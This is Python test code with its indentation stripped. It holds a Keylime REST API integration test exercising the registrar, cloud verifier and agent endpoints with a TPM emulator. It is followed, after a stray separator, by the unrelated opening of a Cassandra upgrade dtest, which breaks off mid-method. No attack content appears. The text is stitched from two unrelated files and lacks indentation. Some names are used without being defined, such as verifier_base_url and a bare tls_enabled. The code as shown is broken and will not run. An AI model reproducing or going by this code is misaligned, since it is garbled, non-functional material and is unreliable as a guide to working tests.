def fileRemove(path):
try:
os.remove(path)
except OSError as e:
# Ignore if file does not exist
if e.errno != errno.ENOENT:
raise
# Boring setup stuff
def setUpModule():
try:
env = os.environ.copy()
env['PATH'] = env['PATH'] + ":/usr/local/bin"
# Run init_tpm_server and tpm_serverd (start fresh)
its = subprocess.Popen(["init_tpm_server"], shell=False, env=env)
its.wait()
tsd = subprocess.Popen(["tpm_serverd"], shell=False, env=env)
tsd.wait()
except Exception as e:
print("WARNING: Restarting TPM emulator failed!")
# Note: the following is required as abrmd is failing to reconnect to MSSIM, once
# MSSIM is killed and restarted. If this is an proved an actual bug and is
# fixed upstream, the following dbus restart call can be removed.
try:
sysbus = dbus.SystemBus()
systemd1 = sysbus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
manager = dbus.Interface(systemd1, 'org.freedesktop.systemd1.Manager')
# If the systemd service exists, let's restart it.
for service in sysbus.list_names():
if "com.intel.tss2.Tabrmd" in service:
print("Found dbus service:", str(service))
try:
print("Restarting tpm2-abrmd.service.")
manager.RestartUnit('tpm2-abrmd.service', 'fail')
except dbus.exceptions.DBusException as e:
print(e)
except Exception as e:
print("Non systemd agent detected, no tpm2-abrmd restart required.")
try:
# Start with a clean slate for this test
fileRemove(config.WORK_DIR + "/tpmdata.yaml")
fileRemove(config.WORK_DIR + "/cv_data.sqlite")
fileRemove(config.WORK_DIR + "/reg_data.sqlite")
shutil.rmtree(config.WORK_DIR + "/cv_ca", True)
except Exception as e:
print("WARNING: Cleanup of TPM files failed!")
# CV must be run first to create CA and certs!
launch_cloudverifier()
launch_registrar()
# launch_cloudagent()
# Make the Tenant do a lot of set-up work for us
global tenant_templ
tenant_templ = tenant.Tenant()
tenant_templ.agent_uuid = config.get('cloud_agent', 'agent_uuid')
tenant_templ.cloudagent_ip = "localhost"
tenant_templ.cloudagent_port = config.get('cloud_agent', 'cloudagent_port')
tenant_templ.verifier_ip = config.get('cloud_verifier', 'cloudverifier_ip')
tenant_templ.verifier_port = config.get('cloud_verifier', 'cloudverifier_port')
tenant_templ.registrar_ip = config.get('registrar', 'registrar_ip')
tenant_templ.registrar_boot_port = config.get('registrar', 'registrar_port')
tenant_templ.registrar_tls_boot_port = config.get('registrar', 'registrar_tls_port')
tenant_templ.registrar_base_url = f'{tenant_templ.registrar_ip}:{tenant_templ.registrar_boot_port}'
tenant_templ.registrar_base_tls_url = f'{tenant_templ.registrar_ip}:{tenant_templ.registrar_tls_boot_port}'
tenant_templ.agent_base_url = f'{tenant_templ.cloudagent_ip}:{tenant_templ.cloudagent_port}'
# Set up TLS
my_tls_cert, my_tls_priv_key = tenant_templ.get_tls_context()
tenant_templ.cert = (my_tls_cert, my_tls_priv_key)
# Destroy everything on teardown
def tearDownModule():
# Tear down in reverse order of dependencies
kill_cloudagent()
kill_cloudverifier()
kill_registrar()
def launch_cloudverifier():
"""Start up the cloud verifier"""
global cv_process, script_env, FORK_ARGS
if cv_process is None:
cv_process = subprocess.Popen("keylime_verifier",
shell=False,
preexec_fn=os.setsid,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=script_env)
def initthread():
sys.stdout.write('\033[96m' + "\nCloud Verifier Thread" + '\033[0m')
while True:
line = cv_process.stdout.readline()
if line == b'':
break
line = line.decode('utf-8')
line = line.rstrip(os.linesep)
sys.stdout.flush()
sys.stdout.write('\n\033[96m' + line + '\033[0m')
t = threading.Thread(target=initthread)
t.start()
time.sleep(30)
return True
def launch_registrar():
"""Start up the registrar"""
global reg_process, script_env, FORK_ARGS
if reg_process is None:
reg_process = subprocess.Popen("keylime_registrar",
shell=False,
preexec_fn=os.setsid,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=script_env)
def initthread():
sys.stdout.write('\033[95m' + "\nRegistrar Thread" + '\033[0m')
while True:
line = reg_process.stdout.readline()
if line == b"":
break
# line = line.rstrip(os.linesep)
line = line.decode('utf-8')
sys.stdout.flush()
sys.stdout.write('\n\033[95m' + line + '\033[0m')
t = threading.Thread(target=initthread)
t.start()
time.sleep(10)
return True
def launch_cloudagent():
"""Start up the cloud agent"""
global agent_process, script_env, FORK_ARGS
if agent_process is None:
agent_process = subprocess.Popen("keylime_agent",
shell=False,
preexec_fn=os.setsid,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=script_env)
def initthread():
sys.stdout.write('\033[94m' + "\nCloud Agent Thread" + '\033[0m')
while True:
line = agent_process.stdout.readline()
if line == b'':
break
# line = line.rstrip(os.linesep)
line = line.decode('utf-8')
sys.stdout.flush()
sys.stdout.write('\n\033[94m' + line + '\033[0m')
t = threading.Thread(target=initthread)
t.start()
time.sleep(10)
return True
def kill_cloudverifier():
"""Kill the cloud verifier"""
global cv_process
if cv_process is None:
return
os.killpg(os.getpgid(cv_process.pid), signal.SIGINT)
cv_process.wait()
cv_process = None
def kill_registrar():
"""Kill the registrar"""
global reg_process
if reg_process is None:
return
os.killpg(os.getpgid(reg_process.pid), signal.SIGINT)
reg_process.wait()
reg_process = None
def kill_cloudagent():
"""Kill the cloud agent"""
global agent_process
if agent_process is None:
return
os.killpg(os.getpgid(agent_process.pid), signal.SIGINT)
agent_process.wait()
agent_process = None
def services_running():
if reg_process.poll() is None and cv_process.poll() is None:
return True
return False
class TestRestful(unittest.TestCase):
# Static class members (won't change between tests)
payload = None
auth_tag = None
tpm_policy = {}
vtpm_policy = {}
metadata = {}
allowlist = {}
revocation_key = ""
mb_refstate = None
K = None
U = None
V = None
api_version = config.API_VERSION
cloudagent_ip = None
cloudagent_port = None
@classmethod
def setUpClass(cls):
"""Prepare the keys and payload to give to the CV"""
contents = "random garbage to test as payload"
# contents = contents.encode('utf-8')
ret = user_data_encrypt.encrypt(contents)
cls.K = ret['k']
cls.U = ret['u']
cls.V = ret['v']
cls.payload = ret['ciphertext']
# Set up to register an agent
cls.auth_tag = crypto.do_hmac(cls.K, tenant_templ.agent_uuid)
# Prepare policies for agent
cls.tpm_policy = config.get('tenant', 'tpm_policy')
cls.vtpm_policy = config.get('tenant', 'vtpm_policy')
cls.tpm_policy = tpm_abstract.TPM_Utilities.readPolicy(cls.tpm_policy)
cls.vtpm_policy = tpm_abstract.TPM_Utilities.readPolicy(cls.vtpm_policy)
# Allow targeting a specific API version (default latest)
cls.api_version = config.API_VERSION
def setUp(self):
"""Nothing to set up before each test"""
return
def test_000_services(self):
"""Ensure everyone is running before doing tests"""
self.assertTrue(services_running(), "Not all services started successfully!")
# Registrar Testset
def test_010_reg_agent_post(self):
"""Test registrar's POST /v2/agents/{UUID} Interface"""
global keyblob, vtpm, tpm_instance, ek_tpm, aik_tpm
tpm_instance = tpm_main.tpm()
# Change CWD for TPM-related operations
cwd = os.getcwd()
config.ch_dir(config.WORK_DIR, None)
_ = secure_mount.mount()
# Initialize the TPM with AIK
(ekcert, ek_tpm, aik_tpm) = tpm_instance.tpm_init(self_activate=False,
config_pw=config.get('cloud_agent', 'tpm_ownerpassword'))
vtpm = tpm_instance.is_vtpm()
# Handle virtualized and emulated TPMs
if ekcert is None:
if vtpm:
ekcert = 'virtual'
elif tpm_instance.is_emulator():
ekcert = 'emulator'
# Get back to our original CWD
config.ch_dir(cwd, None)
data = {
'ekcert': ekcert,
'aik_tpm': aik_tpm,
}
if ekcert is None or ekcert == 'emulator':
data['ek_tpm'] = ek_tpm
test_010_reg_agent_post = RequestsClient(tenant_templ.registrar_base_url, tls_enabled=False)
response = test_010_reg_agent_post.post(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent Add return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("blob", json_response["results"], "Malformed response body!")
keyblob = json_response["results"]["blob"]
self.assertIsNotNone(keyblob, "Malformed response body!")
@unittest.skipIf(vtpm, "Registrar's PUT /v2/agents/{UUID}/activate only for non-vTPMs!")
def test_011_reg_agent_activate_put(self):
"""Test registrar's PUT /v2/agents/{UUID}/activate Interface"""
global keyblob
self.assertIsNotNone(keyblob, "Required value not set. Previous step may have failed?")
key = tpm_instance.activate_identity(keyblob)
data = {
'auth_tag': crypto.do_hmac(key, tenant_templ.agent_uuid),
}
test_011_reg_agent_activate_put = RequestsClient(tenant_templ.registrar_base_url, tls_enabled=False)
response = test_011_reg_agent_activate_put.put(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}/activate',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent Activate return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_013_reg_agents_get(self):
"""Test registrar's GET /v2/agents Interface"""
test_013_reg_agents_get = RequestsClient(tenant_templ.registrar_base_tls_url, tls_enabled=True)
response = test_013_reg_agents_get.get(
f'/v{self.api_version}/agents/',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent List return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("uuids", json_response["results"], "Malformed response body!")
# We registered exactly one agent so far
self.assertEqual(1, len(json_response["results"]["uuids"]), "Incorrect system state!")
def test_014_reg_agent_get(self):
"""Test registrar's GET /v2/agents/{UUID} Interface"""
test_014_reg_agent_get = RequestsClient(tenant_templ.registrar_base_tls_url, tls_enabled=True)
response = test_014_reg_agent_get.get(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("ek_tpm", json_response["results"], "Malformed response body!")
self.assertIn("aik_tpm", json_response["results"], "Malformed response body!")
self.assertIn("ekcert", json_response["results"], "Malformed response body!")
global aik_tpm
aik_tpm = json_response["results"]["aik_tpm"]
def test_015_reg_agent_delete(self):
"""Test registrar's DELETE /v2/agents/{UUID} Interface"""
test_015_reg_agent_delete = RequestsClient(tenant_templ.registrar_base_tls_url, tls_enabled=True)
response = test_015_reg_agent_delete.delete(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar Delete return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
# Agent Setup Testset
def test_020_agent_keys_pubkey_get(self):
"""Test agent's GET /v2/keys/pubkey Interface"""
# We want a real cloud agent to communicate with!
launch_cloudagent()
time.sleep(10)
test_020_agent_keys_pubkey_get = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_020_agent_keys_pubkey_get.get(
f'/v{self.api_version}/keys/pubkey',
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent pubkey return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("pubkey", json_response["results"], "Malformed response body!")
global public_key
public_key = json_response["results"]["pubkey"]
self.assertNotEqual(public_key, None, "Malformed response body!")
def test_021_reg_agent_get(self):
# We need to refresh the aik value we've stored in case it changed
self.test_014_reg_agent_get()
def test_022_agent_quotes_identity_get(self):
"""Test agent's GET /v2/quotes/identity Interface"""
self.assertIsNotNone(aik_tpm, "Required value not set. Previous step may have failed?")
nonce = tpm_abstract.TPM_Utilities.random_password(20)
numretries = config.getint('tenant', 'max_retries')
while numretries >= 0:
test_022_agent_quotes_identity_get = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_022_agent_quotes_identity_get.get(
f'/v{self.api_version}/quotes/identity?nonce={nonce}',
data=None,
cert="",
verify=False
)
if response.status_code == 200:
break
numretries -= 1
time.sleep(config.getint('tenant', 'retry_interval'))
self.assertEqual(response.status_code, 200, "Non-successful Agent identity return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("quote", json_response["results"], "Malformed response body!")
self.assertIn("pubkey", json_response["results"], "Malformed response body!")
# Check the quote identity
self.assertTrue(tpm_instance.check_quote(tenant_templ.agent_uuid,
nonce,
json_response["results"]["pubkey"],
json_response["results"]["quote"],
aik_tpm,
hash_alg=json_response["results"]["hash_alg"]),
"Invalid quote!")
@unittest.skip("Testing of agent's POST /v2/keys/vkey disabled! (spawned CV should do this already)")
def test_023_agent_keys_vkey_post(self):
"""Test agent's POST /v2/keys/vkey Interface"""
# CV should do this (during CV POST/PUT test)
# Running this test might hide problems with the CV sending the V key
global public_key
self.assertIsNotNone(self.V, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(public_key, "Required value not set. Previous step may have failed?")
encrypted_V = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key), str(self.V))
b64_encrypted_V = base64.b64encode(encrypted_V)
data = {'encrypted_key': b64_encrypted_V}
test_023_agent_keys_vkey_post = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_023_agent_keys_vkey_post.post(
f'/v{self.api_version}/keys/vkey',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent vkey post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_024_agent_keys_ukey_post(self):
"""Test agents's POST /v2/keys/ukey Interface"""
global public_key
self.assertIsNotNone(public_key, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(self.U, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(self.auth_tag, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(self.payload, "Required value not set. Previous step may have failed?")
encrypted_U = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key), self.U)
b64_encrypted_u = base64.b64encode(encrypted_U)
data = {
'encrypted_key': b64_encrypted_u,
'auth_tag': self.auth_tag,
'payload': self.payload
}
test_024_agent_keys_ukey_post = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_024_agent_keys_ukey_post.post(
f'/v{self.api_version}/keys/ukey',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent ukey post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_025_cv_allowlist_post(self):
"""Test CV's POST /v2/allowlist/{name} Interface"""
data = {
'name': 'test-allowlist',
'tpm_policy': json.dumps(self.tpm_policy),
'vtpm_policy': json.dumps(self.vtpm_policy),
'ima_policy': json.dumps(self.allowlist),
}
cv_client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = cv_client.post(
'/allowlists/test-allowlist',
data=json.dumps(data),
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 201, "Non-successful CV allowlist Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_026_cv_allowlist_get(self):
"""Test CV's GET /v2/allowlists/{name} Interface"""
cv_client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = cv_client.get(
'/allowlists/test-allowlist',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV allowlist Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
results = json_response['results']
self.assertEqual(results['name'], 'test-allowlist')
self.assertEqual(results['tpm_policy'], json.dumps(self.tpm_policy))
self.assertEqual(results['vtpm_policy'], json.dumps(self.vtpm_policy))
self.assertEqual(results['ima_policy'], json.dumps(self.allowlist))
def test_027_cv_allowlist_delete(self):
"""Test CV's DELETE /v2/allowlists/{name} Interface"""
cv_client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = cv_client.delete(
'/allowlists/test-allowlist',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 204, "Non-successful CV allowlist Delete return code!")
# Cloud Verifier Testset
def test_030_cv_agent_post(self):
"""Test CV's POST /v2/agents/{UUID} Interface"""
self.assertIsNotNone(self.V, "Required value not set. Previous step may have failed?")
b64_v = base64.b64encode(self.V)
data = {
'v': b64_v,
'cloudagent_ip': tenant_templ.cloudagent_ip,
'cloudagent_port': tenant_templ.cloudagent_port,
'tpm_policy': json.dumps(self.tpm_policy),
'vtpm_policy': json.dumps(self.vtpm_policy),
'allowlist': json.dumps(self.allowlist),
'ima_sign_verification_keys': '',
'mb_refstate': None,
'metadata': json.dumps(self.metadata),
'revocation_key': self.revocation_key,
'accept_tpm_hash_algs': config.get('tenant', 'accept_tpm_hash_algs').split(','),
'accept_tpm_encryption_algs': config.get('tenant', 'accept_tpm_encryption_algs').split(','),
'accept_tpm_signing_algs': config.get('tenant', 'accept_tpm_signing_algs').split(','),
}
test_030_cv_agent_post = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_030_cv_agent_post.post(
f'/agents/{tenant_templ.agent_uuid}',
data=json.dumps(data),
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
time.sleep(10)
@unittest.skip("Testing of CV's PUT /v2/agents/{UUID} disabled!")
def test_031_cv_agent_put(self):
"""Test CV's PUT /v2/agents/{UUID} Interface"""
# TODO: this should actually test PUT functionality (e.g., make agent fail and then PUT back up)
test_031_cv_agent_put = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_031_cv_agent_put.put(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
data=b'',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_032_cv_agents_get(self):
"""Test CV's GET /v2/agents Interface"""
test_032_cv_agents_get = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_032_cv_agents_get.get(
f'/v{self.api_version}/agents/',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent List return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("uuids", json_response["results"], "Malformed response body!")
# Be sure our agent is registered
self.assertEqual(1, len(json_response["results"]["uuids"]))
def test_033_cv_agent_get(self):
"""Test CV's GET /v2/agents/{UUID} Interface"""
test_033_cv_agent_get = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_033_cv_agent_get.get(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
# Check a few of the important properties are present
self.assertIn("operational_state", json_response["results"], "Malformed response body!")
self.assertIn("ip", json_response["results"], "Malformed response body!")
self.assertIn("port", json_response["results"], "Malformed response body!")
def test_034_cv_agent_post_invalid_exclude_list(self):
"""Test CV's POST /v2/agents/{UUID} Interface"""
self.assertIsNotNone(self.V, "Required value not set. Previous step may have failed?")
b64_v = base64.b64encode(self.V)
# Set unsupported regex in exclude list
allowlist = {'exclude': ['*']}
data = {
'v': b64_v,
'mb_refstate': None,
'cloudagent_ip': tenant_templ.cloudagent_ip,
'cloudagent_port': tenant_templ.cloudagent_port,
'tpm_policy': json.dumps(self.tpm_policy),
'vtpm_policy': json.dumps(self.vtpm_policy),
'allowlist': json.dumps(allowlist),
'ima_sign_verification_keys': '',
'metadata': json.dumps(self.metadata),
'revocation_key': self.revocation_key,
'accept_tpm_hash_algs': config.get('tenant', 'accept_tpm_hash_algs').split(','),
'accept_tpm_encryption_algs': config.get('tenant', 'accept_tpm_encryption_algs').split(','),
'accept_tpm_signing_algs': config.get('tenant', 'accept_tpm_signing_algs').split(','),
}
client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = client.post(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
data=json.dumps(data),
verify=False
)
self.assertEqual(response.status_code, 400, "Successful CV agent Post return code!")
# Ensure response is well-formed
json_response = response.json()
self.assertIn("results", json_response, "Malformed response body!")
# Agent Poll Testset
def test_040_agent_quotes_integrity_get(self):
"""Test agent's GET /v2/quotes/integrity Interface"""
global public_key
self.assertIsNotNone(aik_tpm, "Required value not set. Previous step may have failed?")
nonce = tpm_abstract.TPM_Utilities.random_password(20)
mask = self.tpm_policy["mask"]
vmask = self.vtpm_policy["mask"]
partial = "1"
if public_key is None:
partial = "0"
test_040_agent_quotes_integrity_get = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_040_agent_quotes_integrity_get.get(
f'/v{self.api_version}/quotes/integrity?nonce={nonce}&mask={mask}&vmask={vmask}&partial={partial}',
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent Integrity Get return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("quote", json_response["results"], "Malformed response body!")
if public_key is None:
self.assertIn("pubkey", json_response["results"], "Malformed response body!")
public_key = json_response["results"]["pubkey"]
self.assertIn("hash_alg", json_response["results"], "Malformed response body!")
quote = json_response["results"]["quote"]
hash_alg = json_response["results"]["hash_alg"]
validQuote = tpm_instance.check_quote(tenant_templ.agent_uuid,
nonce,
public_key,
quote,
aik_tpm,
self.tpm_policy,
hash_alg=hash_alg)
self.assertTrue(validQuote)
async def test_041_agent_keys_verify_get(self):
"""Test agent's GET /v2/keys/verify Interface
We use async here to allow function await while key processes"""
self.assertIsNotNone(self.K, "Required value not set. Previous step may have failed?")
challenge = tpm_abstract.TPM_Utilities.random_password(20)
encoded = base64.b64encode(self.K).decode('utf-8')
response = tornado_requests.request("GET",
"http://%s:%s/keys/verify?challenge=%s" % (self.cloudagent_ip, self.cloudagent_port, challenge))
response = await response
self.assertEqual(response.status, 200, "Non-successful Agent verify return code!")
json_response = json.loads(response.read().decode())
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("hmac", json_response["results"], "Malformed response body!")
# Be sure response is valid
mac = json_response['results']['hmac']
ex_mac = crypto.do_hmac(encoded, challenge)
# ex_mac = crypto.do_hmac(self.K, challenge)
self.assertEqual(mac, ex_mac, "Agent failed to validate challenge code!")
# CV Cleanup Testset
def test_050_cv_agent_delete(self):
"""Test CV's DELETE /v2/agents/{UUID} Interface"""
time.sleep(5)
test_050_cv_agent_delete = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_050_cv_agent_delete.delete(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 202, "Non-successful CV agent Delete return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def tearDown(self):
"""Nothing to bring down after each test"""
return
@classmethod
def tearDownClass(cls):
"""Nothing to bring down"""
return
if __name__ == '__main__':
unittest.main()
|
upgrade_through_versions_test.py | import operator
import os
import pprint
import random
import signal
import time
import uuid
from collections import defaultdict, namedtuple
from multiprocessing import Process, Queue
from Queue import Empty, Full
from unittest import skipUnless
import psutil
from cassandra import ConsistencyLevel, WriteTimeout
from cassandra.query import SimpleStatement
from nose.plugins.attrib import attr
from six import print_
from dtest import RUN_STATIC_UPGRADE_MATRIX, Tester, debug
from tools import generate_ssl_stores, known_failure, new_node
from upgrade_base import switch_jdks
from upgrade_manifest import (build_upgrade_pairs, current_2_0_x,
current_2_1_x, current_2_2_x, current_3_0_x,
indev_2_2_x, indev_3_x)
def data_writer(tester, to_verify_queue, verification_done_queue, rewrite_probability=0):
"""
Process for writing/rewriting data continuously.
Pushes to a queue to be consumed by data_checker.
Pulls from a queue of already-verified rows written by data_checker that it can overwrite.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("UPDATE cf SET v=? WHERE k=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
to_verify_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
key = None
if (rewrite_probability > 0) and (random.randint(0, 100) <= rewrite_probability):
try:
key = verification_done_queue.get_nowait()
except Empty:
# we wanted a re-write but the re-writable queue was empty. oh well.
pass
key = key or uuid.uuid4()
val = uuid.uuid4()
session.execute(prepared, (val, key))
to_verify_queue.put_nowait((key, val,))
except Exception:
debug("Error in data writer process!")
to_verify_queue.close()
raise
def data_checker(tester, to_verify_queue, verification_done_queue):
"""
Process for checking data continuously.
Pulls from a queue written to by data_writer to know what to verify.
Pushes to a queue to tell data_writer what's been verified and could be a candidate for re-writing.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("SELECT v FROM cf WHERE k=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
verification_done_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
# here we could block, but if the writer process terminates early with an empty queue
# we would end up blocking indefinitely
(key, expected_val) = to_verify_queue.get_nowait()
actual_val = session.execute(prepared, (key,))[0][0]
except Empty:
time.sleep(0.1) # let's not eat CPU if the queue is empty
continue
except Exception:
debug("Error in data verifier process!")
verification_done_queue.close()
raise
else:
try:
verification_done_queue.put_nowait(key)
except Full:
# the rewritable queue is full, not a big deal. drop this one.
# we keep the rewritable queue held to a modest max size
# and allow dropping some rewritables because we don't want to
# rewrite rows in the same sequence as originally written
pass
tester.assertEqual(expected_val, actual_val, "Data did not match expected value!")
def counter_incrementer(tester, to_verify_queue, verification_done_queue, rewrite_probability=0):
"""
Process for incrementing counters continuously.
Pushes to a queue to be consumed by counter_checker.
Pulls from a queue of already-verified rows written by data_checker that it can increment again.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("UPDATE countertable SET c = c + 1 WHERE k1=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
to_verify_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
key = None
count = 0 # this will get set to actual last known count if we do a re-write
if (rewrite_probability > 0) and (random.randint(0, 100) <= rewrite_probability):
try:
key, count = verification_done_queue.get_nowait()
except Empty:
# we wanted a re-write but the re-writable queue was empty. oh well.
pass
key = key or uuid.uuid4()
session.execute(prepared, (key))
to_verify_queue.put_nowait((key, count + 1,))
except Exception:
debug("Error in counter incrementer process!")
to_verify_queue.close()
raise
def counter_checker(tester, to_verify_queue, verification_done_queue):
"""
Process for checking counters continuously.
Pulls from a queue written to by counter_incrementer to know what to verify.
Pushes to a queue to tell counter_incrementer what's been verified and could be a candidate for incrementing again.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("SELECT c FROM countertable WHERE k1=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
verification_done_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
# here we could block, but if the writer process terminates early with an empty queue
# we would end up blocking indefinitely
(key, expected_count) = to_verify_queue.get_nowait()
actual_count = session.execute(prepared, (key,))[0][0]
except Empty:
time.sleep(0.1) # let's not eat CPU if the queue is empty
continue
except Exception:
debug("Error in counter verifier process!")
verification_done_queue.close()
raise
else:
tester.assertEqual(expected_count, actual_count, "Data did not match expected value!")
try:
verification_done_queue.put_nowait((key, actual_count))
except Full:
# the rewritable queue is full, not a big deal. drop this one.
# we keep the rewritable queue held to a modest max size
# and allow dropping some rewritables because we don't want to
# rewrite rows in the same sequence as originally written
pass
@attr("resource-intensive")
class UpgradeTester(Tester):
"""
Upgrades a 3-node Murmur3Partitioner cluster through versions specified in test_version_metas.
"""
test_version_metas = None # set on init to know which versions to use
subprocs = None # holds any subprocesses, for status checking and cleanup
extra_config = None # holds a non-mutable structure that can be cast as dict()
__test__ = False # this is a base class only
def __init__(self, *args, **kwargs):
# Ignore these log patterns:
self.ignore_log_patterns = [
# This one occurs if we do a non-rolling upgrade, the node
# it's trying to send the migration to hasn't started yet,
# and when it does, it gets replayed and everything is fine.
r'Can\'t send migration request: node.*is down',
r'RejectedExecutionException.*ThreadPoolExecutor has shut down',
# Occurs due to test/ccm writing topo on down nodes
r'Cannot update data center or rack from.*for live host',
# Normal occurance. See CASSANDRA-12026. Likely won't be needed after C* 4.0.
r'Unknown column cdc during deserialization',
]
self.subprocs = []
Tester.__init__(self, *args, **kwargs)
def setUp(self):
debug("Upgrade test beginning, setting CASSANDRA_VERSION to {}, and jdk to {}. (Prior values will be restored after test)."
.format(self.test_version_metas[0].version, self.test_version_metas[0].java_version))
os.environ['CASSANDRA_VERSION'] = self.test_version_metas[0].version
switch_jdks(self.test_version_metas[0].java_version)
